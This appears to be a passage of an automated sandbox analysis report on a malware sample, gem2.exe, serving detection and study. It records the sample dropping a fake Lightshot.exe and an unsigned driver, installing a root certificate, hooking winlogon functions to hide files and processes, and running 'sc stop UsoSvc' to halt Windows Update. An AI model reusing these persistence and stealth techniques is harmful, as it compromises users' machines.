          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: gem2.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: gem2.exeStatic file information: File size 2876416 > 1048576
          Source: gem2.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x2b2000
          Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp
          Source: gem2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: gem2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: gem2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: gem2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: gem2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
          Source: gem2.exeStatic PE information: section name: .00cfg
          Source: Lightshot.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B1394 push qword ptr [00007FF72A7BE004h]; ret 0_2_00007FF72A7B1403
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85896ACDD push rcx; retf 003Fh29_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85899C6DD push rcx; retf 003Fh29_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589CACDD push rcx; retf 003Fh29_2_000001E8589CACDE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140ADFDACDD push rcx; retf 003Fh36_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE87C6DD push rcx; retf 003Fh36_2_00000140AE87C6DE
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D81394 push qword ptr [00007FF6E4D8E004h]; ret 37_2_00007FF6E4D81403
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5AACDD push rcx; retf 003Fh40_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5DC6DD push rcx; retf 003Fh40_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBCACDD push rcx; retf 003Fh41_2_000001160CBCACDE
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBFC6DD push rcx; retf 003Fh41_2_000001160CBFC6DE
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E108ACDD push rcx; retf 003Fh66_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10BC6DD push rcx; retf 003Fh66_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1EACDD push rcx; retf 003Fh67_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C94C6DD push rcx; retf 003Fh67_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FEACDD push rcx; retf 003Fh68_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9855C6DD push rcx; retf 003Fh68_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652FACDD push rcx; retf 003Fh69_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26532C6DD push rcx; retf 003Fh69_2_000001D26532C6DE

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\TEMP\yycjbdwxjaoe.sysJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Users\user\Desktop\gem2.exeFile created: C:\ProgramData\Screenshots\Lightshot.exeJump to dropped file
          Source: C:\Users\user\Desktop\gem2.exeFile created: C:\ProgramData\Screenshots\Lightshot.exeJump to dropped file
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hooks files or directories query functions (used to hide files and directories)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Hooks processes query functions (used to hide processes)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Hooks registry keys query functions (used to hide registry keys)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
